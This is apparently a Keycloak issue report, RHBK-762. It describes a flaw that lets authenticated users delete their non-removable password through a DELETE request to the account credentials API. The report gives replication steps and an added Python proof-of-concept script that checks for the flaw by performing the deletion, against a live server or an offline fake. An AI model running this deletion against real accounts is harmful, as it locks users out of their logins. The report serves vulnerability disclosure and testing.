Red Hat build of Keycloak / RHBK-762

[GHI#25220] Authenticated users should not be able to delete their passwords via a DELETE request

      Authenticated users are able to delete their own password by sending a DELETE request to the account credentials endpoint with the password's credential ID. This happens even though the password credential is reported as non-removable by a boolean flag in the credential listing, so the endpoint is not enforcing that flag. Once the DELETE request is processed the password credential is removed from the user account and the user can no longer log in with it. The request needs nothing beyond the user's authenticated account session.

      == Replication Steps

      1. The user obtains the credential ID by intercepting the GET request the account console makes to the credentials endpoint. The password credential's ID is the id value under userCredentialMetadatas. See
      2. The user then sends a DELETE request to the credentials endpoint with that credential ID. The request is accepted and removes the password from the user account.
      3. Repeating the GET request to the credentials endpoint confirms that the password credential is no longer listed.
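      The script below is an added example, not code from the Keycloak project or from the issue reporter. It automates the three steps above and reports whether the server lets a non-removable password be deleted. It assumes the account API paths GET/DELETE {base}/realms/{realm}/account/credentials[/{credentialId}] and that the non-removable flag is the boolean "removeable" on the same credential-type object that carries userCredentialMetadatas; the sample GET response and the in-memory FakeAccountApi are constructed so the check runs offline, and the real urllib-based transport is used only when no fake is injected.

```python
"""Check whether an account can delete its own non-removable password credential
through the Keycloak account REST API (the RHBK-762 / GHI#25220 behaviour).

Added example, not code from the Keycloak project or the issue reporter.
Assumed (not stated on the page): the account API paths
  GET    {base}/realms/{realm}/account/credentials
  DELETE {base}/realms/{realm}/account/credentials/{credentialId}
and that the non-removable flag is the boolean "removeable" on the
credential-type container that also holds "userCredentialMetadatas".
"""
import json
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample of a GET credentials response: the password's ID sits under
# userCredentialMetadatas[].credential.id, as the report describes.
SAMPLE_CREDENTIALS = json.loads("""
[
  {"type": "password", "category": "basic-authentication", "removeable": false,
   "userCredentialMetadatas": [
     {"credential": {"id": "2f0c6e2a-1111-4a7e-9a8c-0d3b3a0c0001", "type": "password"}}]},
  {"type": "otp", "category": "two-factor", "removeable": true,
   "userCredentialMetadatas": [
     {"credential": {"id": "7b1e4c3d-2222-4f0e-8b6d-0d3b3a0c0002", "type": "otp",
                     "userLabel": "phone"}}]}
]
""")

Http = Callable[[str, str, str], Tuple[int, Optional[list]]]


def find_credentials(creds: list, cred_type: str) -> List[Dict]:
    """Return {id, removeable} for every stored credential of the given type."""
    found = []
    for container in creds:
        if container.get("type") != cred_type:
            continue
        removeable = bool(container.get("removeable", True))
        for meta in container.get("userCredentialMetadatas", []):
            cred_id = meta.get("credential", {}).get("id")
            if cred_id:
                found.append({"id": cred_id, "removeable": removeable})
    return found


def password_credential_id(creds: list) -> Optional[str]:
    """Step 1 of the report: pick the password credential ID out of the listing."""
    pw = find_credentials(creds, "password")
    return pw[0]["id"] if pw else None


def credentials_url(base: str, realm: str, cred_id: str = "") -> str:
    url = f"{base.rstrip('/')}/realms/{realm}/account/credentials"
    return f"{url}/{cred_id}" if cred_id else url


def http_json(url: str, token: str, method: str = "GET") -> Tuple[int, Optional[list]]:
    """Bearer-authenticated request against a live server (used when no fake is injected)."""
    req = urllib.request.Request(url, method=method, headers={
        "Authorization": f"Bearer {token}", "Accept": "application/json"})
    with urllib.request.urlopen(req) as resp:
        body = resp.read()
        return resp.status, (json.loads(body) if body else None)


def check_password_removal(base: str, realm: str, token: str, http: Http = http_json) -> Dict:
    """Steps 1-3 of the report. On a vulnerable server the DELETE succeeds and the
    password disappears; on a correct server a non-removable password survives."""
    _, before = http(credentials_url(base, realm), token, "GET")
    pw = find_credentials(before or [], "password")
    if not pw:
        return {"vulnerable": False, "reason": "no password credential"}
    cred = pw[0]
    status, _ = http(credentials_url(base, realm, cred["id"]), token, "DELETE")
    _, after = http(credentials_url(base, realm), token, "GET")
    still_present = any(c["id"] == cred["id"] for c in find_credentials(after or [], "password"))
    return {"credential_id": cred["id"], "removeable": cred["removeable"],
            "delete_status": status, "password_still_present": still_present,
            "vulnerable": not cred["removeable"] and not still_present}


class FakeAccountApi:
    """In-memory stand-in for the endpoint so the check runs offline. With
    enforce_removeable=False it behaves like the reported (vulnerable) server."""

    def __init__(self, creds: list, enforce_removeable: bool):
        self.creds = json.loads(json.dumps(creds))  # private deep copy
        self.enforce = enforce_removeable

    def __call__(self, url: str, token: str, method: str = "GET"):
        if method == "GET":
            return 200, json.loads(json.dumps(self.creds))
        cred_id = url.rsplit("/", 1)[-1]
        for container in self.creds:
            metas = container.get("userCredentialMetadatas", [])
            for meta in list(metas):
                if meta["credential"]["id"] != cred_id:
                    continue
                if self.enforce and not container.get("removeable", True):
                    return 400, None  # correct behaviour: refuse the delete
                metas.remove(meta)
                return 204, None
        return 404, None


if __name__ == "__main__":
    for label, enforce in (("vulnerable", False), ("fixed", True)):
        api = FakeAccountApi(SAMPLE_CREDENTIALS, enforce)
        print(label, check_password_removal("https://sso.example", "demo", "token", api))
```

      Against a live server, pass a bearer token obtained for the account console and leave the http argument at its default; a result with vulnerable=True means the non-removable password was deleted and the account is locked out, so run it only on a test user.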

      Assignee: Unassigned
      Reporter: Peter Skopek (pskopek@redhat.com)
      CIAM-K Core Features